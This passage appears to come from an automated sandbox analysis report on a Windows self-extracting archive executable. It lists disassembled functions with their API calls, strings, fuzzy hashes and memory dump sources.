                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db809e192cf19f0a24ea19e6bd7e2f75457c2a87470eea816a6da0ccbcf2e07b
                          • Instruction ID: 6a851bcdadc488821aa74cd2659a8ff4793d596b855de7fa0fee7a6c1003e902
                          • Opcode Fuzzy Hash: db809e192cf19f0a24ea19e6bd7e2f75457c2a87470eea816a6da0ccbcf2e07b
                          • Instruction Fuzzy Hash: 5B01D1327083525FC700CE3DA94079AFBFAEB95364F154678E40AC3205E3719D158790
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c5e3e38637a171c2a56c8a3f52807821598aabae375b0d0ad3d56284ee6ba30c
                          • Instruction ID: 8b8f09e05ff2fd414f8061562577387390c71cef8d4becc895e697f8c1a12e31
                          • Opcode Fuzzy Hash: c5e3e38637a171c2a56c8a3f52807821598aabae375b0d0ad3d56284ee6ba30c
                          • Instruction Fuzzy Hash: E1F0B4322057925FD300CE2AE64066AFBE9EBD6268F114564E00AC3205C3719D00CBD0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: __onexit
                          • String ID:
                          • API String ID: 1448380652-0
                          • Opcode ID: 1e2ca840ba5ad3c5f68825b14498f01676d99d2d95d3c54a3f31bc9d32ee17c9
                          • Instruction ID: cceb0250c66f075b0a598f0768a96b49e4ada921adf3f2bb94435b277e80e83b
                          • Opcode Fuzzy Hash: 1e2ca840ba5ad3c5f68825b14498f01676d99d2d95d3c54a3f31bc9d32ee17c9
                          • Instruction Fuzzy Hash: 19E092B1944688FBCB00DF94ED42B55B7B8E706B20F10437AE825D3BD0DB355510CA41
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b02d106da9eb3450db7f3991f867e74de4bf2bc5e6de34d14924ed1c86e68bfa
                          • Instruction ID: 8f88ce855dd97581c73b8d33fad287ac82808d06e83ef3ccf6d0e7633370f938
                          • Opcode Fuzzy Hash: b02d106da9eb3450db7f3991f867e74de4bf2bc5e6de34d14924ed1c86e68bfa
                          • Instruction Fuzzy Hash: 9AB012395015004FA706CE29EC228A132B273D3300776C4A4D01345014D73A9001C500
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 001E4C0A
                            • Part of subcall function 001E248D: _wcslen.LIBCMT ref: 001E24AD
                            • Part of subcall function 001E248D: _wcslen.LIBCMT ref: 001E24C8
                            • Part of subcall function 001F7C90: DeleteFileW.KERNEL32(?,1FE05385,?,?,00000000), ref: 001F7CC8
                          • _wcslen.LIBCMT ref: 001E4D25
                          • _wcslen.LIBCMT ref: 001E4D3B
                          • _wcslen.LIBCMT ref: 001E4D57
                          • _wcslen.LIBCMT ref: 001E4D68
                          • LoadLibraryW.KERNEL32(Kernel32.dll,00239840,00000000,?,00000000,00239840,00000000,/s ,00000000,?,00000000,00000002,00000000,0000FEFF,00000002,?), ref: 001E4D8B
                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 001E4DAD
                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 001E4DBB
                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001E4E03
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001E4E11
                          • ShellExecuteExW.SHELL32(0000003C), ref: 001E4EBB
                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001E4EDB
                          • CloseHandle.KERNEL32(00000000), ref: 001E4EE7
                          • FreeLibrary.KERNEL32(00000000), ref: 001E4F07
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen$AddressProc$Library$CloseDeleteExecuteFileFreeH_prolog3_HandleLoadObjectShellSingleWait
                          • String ID: /s $<$GetCurrentProcess$IsWow64Process$Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$sfx.reg
                          • API String ID: 3463751511-1334933446
                          • Opcode ID: eae78940282047d569e9e09f25ce69c647f06d20b2a1f587d281a06ff75abe2b
                          • Instruction ID: 32691dbbb7784937c124b48132893658af4c70f6fe710a451b3c3456b6ea0de5
                          • Opcode Fuzzy Hash: eae78940282047d569e9e09f25ce69c647f06d20b2a1f587d281a06ff75abe2b
                          • Instruction Fuzzy Hash: 949179719102689FDB24EF65CC95BEEB7B9BF15300F0001A9E50AB7291EB709E85CF61
                          APIs
                          • GetDlgItem.USER32(?,000003EC), ref: 001EA704
                          • GetDlgItem.USER32(?,000003EB), ref: 001EA710
                          • SetWindowTextW.USER32(00000000,002397B8), ref: 001EA786
                          • _wcslen.LIBCMT ref: 001EA7AA
                          • _wcslen.LIBCMT ref: 001EA7ED
                          • _wcslen.LIBCMT ref: 001EA871
                          • GetLastError.KERNEL32(0023983C,00000000,?,?,?,000027FD), ref: 001EA884
                          • _wcslen.LIBCMT ref: 001EA8CC
                          • SetWindowTextW.USER32(00000000,002397B8), ref: 001EA8E5
                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001EA907
                          • _wcslen.LIBCMT ref: 001EA9B6
                          • GetLastError.KERNEL32(0023983C,00000000,?,?,?,000027FE,?,?,?), ref: 001EA9C9
                          • _wcslen.LIBCMT ref: 001EAA05
                          • SetWindowTextW.USER32(00000000,002397B8), ref: 001EAA1E
                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001EAA40
                          • GetWindowTextW.USER32(00000000,?,00000104), ref: 001EA729
                            • Part of subcall function 001E1FBC: _wcslen.LIBCMT ref: 001E1FD5
                            • Part of subcall function 001EC180: _wcschr.LIBVCRUNTIME ref: 001EC1B5
                            • Part of subcall function 001EC210: _wcschr.LIBVCRUNTIME ref: 001EC25C
                          • SetWindowTextW.USER32(00000000,002397B8), ref: 001EAABF
                          • _wcslen.LIBCMT ref: 001EAAE3
                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001EAB13
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _wcslen$TextWindow$MessageSend$ErrorItemLast_wcschr
                          • String ID:
                          • API String ID: 190027150-0
                          • Opcode ID: fa206438e109a9affb6c2c03656b360b5fe3604b1ce703a8dd270d043efe655e
                          • Instruction ID: b523fa4817f6e3ac09c479fad2d4dffb902238fa0ef8298ee2fd1f8ee5e7fbe8
                          • Opcode Fuzzy Hash: fa206438e109a9affb6c2c03656b360b5fe3604b1ce703a8dd270d043efe655e
                          • Instruction Fuzzy Hash: 35B14A719106689BCB24EB61DDADAEEB3B8AF61700F4001E9F509A7091DF346F85CF61
                          APIs
                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 0021B6FB
                            • Part of subcall function 0021B722: InitializeCriticalSectionAndSpinCount.KERNEL32(00249220,00000FA0,1FE05385,?,?,?,?,0022F522,000000FF), ref: 0021B751
                            • Part of subcall function 0021B722: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,0022F522,000000FF), ref: 0021B75C
                            • Part of subcall function 0021B722: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,0022F522,000000FF), ref: 0021B76D
                            • Part of subcall function 0021B722: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0021B783
                            • Part of subcall function 0021B722: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0021B791
                            • Part of subcall function 0021B722: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0021B79F
                            • Part of subcall function 0021B722: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0021B7CA
                            • Part of subcall function 0021B722: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0021B7D5
                          • ___scrt_fastfail.LIBCMT ref: 0021B71C
                            • Part of subcall function 0021B473: __onexit.LIBCMT ref: 0021B479
                          Strings
                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0021B757
                          • WakeAllConditionVariable, xrefs: 0021B797
                          • kernel32.dll, xrefs: 0021B768
                          • SleepConditionVariableCS, xrefs: 0021B789
                          • InitializeConditionVariable, xrefs: 0021B77D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                          • API String ID: 66158676-1714406822
                          • Opcode ID: 4605a7b032ffe6cadc486b8e658e9994504fc76693e272bb5fd9ad4b16732255
                          • Instruction ID: c32ebfe940c650ff36444c513667266f6eff0767103e848ab351716aebc5d8d1
                          • Opcode Fuzzy Hash: 4605a7b032ffe6cadc486b8e658e9994504fc76693e272bb5fd9ad4b16732255
                          • Instruction Fuzzy Hash: 96212937A64211BBC3175F74BC9EB9AB7F8DB56B50F114126FD01D62C0DBB088608A70
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 0022647D
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 00225FF0
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 00226002
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 00226014
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 00226026
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 00226038
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 0022604A
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 0022605C
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 0022606E
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 00226080
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 00226092
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 002260A4
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 002260B6
                            • Part of subcall function 00225FD3: _free.LIBCMT ref: 002260C8
                          • _free.LIBCMT ref: 00226472
                            • Part of subcall function 00223185: RtlFreeHeap.NTDLL(00000000,00000000,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?), ref: 0022319B
                            • Part of subcall function 00223185: GetLastError.KERNEL32(?,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?,?), ref: 002231AD
                          • _free.LIBCMT ref: 00226494
                          • _free.LIBCMT ref: 002264A9
                          • _free.LIBCMT ref: 002264B4
                          • _free.LIBCMT ref: 002264D6
                          • _free.LIBCMT ref: 002264E9
                          • _free.LIBCMT ref: 002264F7
                          • _free.LIBCMT ref: 00226502
                          • _free.LIBCMT ref: 0022653A
                          • _free.LIBCMT ref: 00226541
                          • _free.LIBCMT ref: 0022655E
                          • _free.LIBCMT ref: 00226576
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID: 8a$
                          • API String ID: 161543041-2514277133
                          • Opcode ID: 10f8e5a74b103a48317210038ce12ded2fe30193b1d35556c11d1f33bc172f6a
                          • Instruction ID: 2e943da539b9be7e2d5613ebe4a720a16362a9534cd79f1d906845a0c8f1c6f0
                          • Opcode Fuzzy Hash: 10f8e5a74b103a48317210038ce12ded2fe30193b1d35556c11d1f33bc172f6a
                          • Instruction Fuzzy Hash: C6314E32520622BEEB31AEB8E849B5673E9EF40310F904519F489D6151DE39ED71CA14
                          APIs
                            • Part of subcall function 001E5472: GetSystemMetrics.USER32(00000000), ref: 001E548F
                            • Part of subcall function 001E5472: GetSystemMetrics.USER32(00000001), ref: 001E5495
                            • Part of subcall function 001E5472: GetWindowRect.USER32(?,?), ref: 001E54A1
                            • Part of subcall function 001E5472: SetWindowPos.USER32(?,000000FE,?,?,00000001,?,?,?,?,?,?,?,001E4F63,00000001), ref: 001E54E8
                          • GetDlgItem.USER32(?,000003FA), ref: 001E8BBA
                          • SetWindowTextW.USER32(00000000,00000000), ref: 001E8BD5
                          • GetDlgItem.USER32(?,000003FD), ref: 001E8BDF
                          • _wcslen.LIBCMT ref: 001E8C3B
                          • SetWindowTextW.USER32(?,?), ref: 001E8C9E
                          • GetDlgItem.USER32(?,000003FE), ref: 001E8CA8
                          • _wcslen.LIBCMT ref: 001E8D04
                          • SetWindowTextW.USER32(?,?), ref: 001E8D67
                          • GetDlgItem.USER32(?,000003F2), ref: 001E8D71
                          • SetWindowTextW.USER32(?,?), ref: 001E8E21
                          • GetDlgItem.USER32(?,000003F3), ref: 001E8E2B
                          • SetWindowTextW.USER32(00000000,?), ref: 001E8ED6
                            • Part of subcall function 001E8B17: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000100), ref: 001E8B4C
                          • GetDlgItem.USER32(?,000003FB), ref: 001E8EF4
                          • SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 001E8F0B
                          • GetDlgItem.USER32(?,000003FC), ref: 001E8F15
                          • SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 001E8F26
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ItemWindow$Text$MessageMetricsSendSystem_wcslen$FileInfoRect
                          • String ID:
                          • API String ID: 386344580-0
                          • Opcode ID: 27aa12b561fb5a12bae3d178d550e247b25b5e1b88e65ff0daa71f2a64d49b2c
                          • Instruction ID: b5eb9fa336629c49037690fda6b661e28ad8d79a213e2ff8c3e7d212010cff2e
                          • Opcode Fuzzy Hash: 27aa12b561fb5a12bae3d178d550e247b25b5e1b88e65ff0daa71f2a64d49b2c
                          • Instruction Fuzzy Hash: 8BB129712087459FCB15EF66DD96D6FB3E9AFA4B00F40092DF185960A1DF70E909CB22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID: .001$bz2$bzip2$gzip$haozip$part$rar$tar$zip
                          • API String ID: 0-413841648
                          • Opcode ID: bf88829e5b6e20b98f78a07ec3b15f3204c6db6c88ccd3976878ae91af8baf37
                          • Instruction ID: eb4d3c58ba223fab1013e6ee4842dd700b3a190729f14e0eb7d3e0b051a213f3
                          • Opcode Fuzzy Hash: bf88829e5b6e20b98f78a07ec3b15f3204c6db6c88ccd3976878ae91af8baf37
                          • Instruction Fuzzy Hash: A1C15FB29105499ACF15EF95CC919EEF3FABF74310F10462AF41273195EB306A9ACB60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID: %.03d%s$%.3d$.exe$.sfxv$exe$file
                          • API String ID: 0-2984256549
                          • Opcode ID: 2dc80b941c7968d7e3d4fb57cea73650a0e16ad6a20241a5796774f358f3e070
                          • Instruction ID: 31e01c3e21889b59985e4102dc32d0c7dbdabc3f901c79b5e6ed80fdf2ab8d0a
                          • Opcode Fuzzy Hash: 2dc80b941c7968d7e3d4fb57cea73650a0e16ad6a20241a5796774f358f3e070
                          • Instruction Fuzzy Hash: 93126B711187819FC724EF61C896BAFB3E8BFA4304F40492DF59693192EF70A919CB52
                          APIs
                          • _free.LIBCMT ref: 00222DFA
                            • Part of subcall function 00223185: RtlFreeHeap.NTDLL(00000000,00000000,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?), ref: 0022319B
                            • Part of subcall function 00223185: GetLastError.KERNEL32(?,?,00226168,?,00000000,?,00000000,?,0022618F,?,00000007,?,?,002265D1,?,?), ref: 002231AD
                          • _free.LIBCMT ref: 00222E06
                          • _free.LIBCMT ref: 00222E11
                          • _free.LIBCMT ref: 00222E1C
                          • _free.LIBCMT ref: 00222E27
                          • _free.LIBCMT ref: 00222E32
                          • _free.LIBCMT ref: 00222E3D
                          • _free.LIBCMT ref: 00222E48
                          • _free.LIBCMT ref: 00222E53
                          • _free.LIBCMT ref: 00222E61
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: d9e9b2da064ab49afb5a720ada99e01e64922ebb9cfa4d2ad4b72ff6f707c0fc
                          • Instruction ID: 8dd83769ad69e2f80df603d0b4a807aed772644b447d2014bd2b0ddb9473cf56
                          • Opcode Fuzzy Hash: d9e9b2da064ab49afb5a720ada99e01e64922ebb9cfa4d2ad4b72ff6f707c0fc
                          • Instruction Fuzzy Hash: 5D114775520118BFDB05EF94ED42DDD3BA6EF04350B5141A9B9084F222DA36DB749F84
                          APIs
                          • SHBrowseForFolderW.SHELL32(?), ref: 001E9AD3
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001E9AE7
                          • _wcslen.LIBCMT ref: 001E9AF8
                          • GetDlgItem.USER32(?,000003EC), ref: 001E9B1B
                          • SetWindowTextW.USER32(00000000,?), ref: 001E9B2F
                          • SHGetMalloc.SHELL32(?), ref: 001E9B3C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: BrowseFolderFromItemListMallocPathTextWindow_wcslen
                          • String ID: A
                          • API String ID: 2175291554-3554254475
                          • Opcode ID: 85173b21d914f1c1922e31f72f55b0a0b3c3939ec7b5151cdf1c83c9ea74b868
                          • Instruction ID: 6c59d5da5611941d466d16d08e3ce0f0692d00c58f4cc8e605a7acd93d8dab83
                          • Opcode Fuzzy Hash: 85173b21d914f1c1922e31f72f55b0a0b3c3939ec7b5151cdf1c83c9ea74b868
                          • Instruction Fuzzy Hash: 35310E71901218ABCB60DF65EC8DADEB7B8EF58710F1001EAE90DE7151DB709A85CF61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
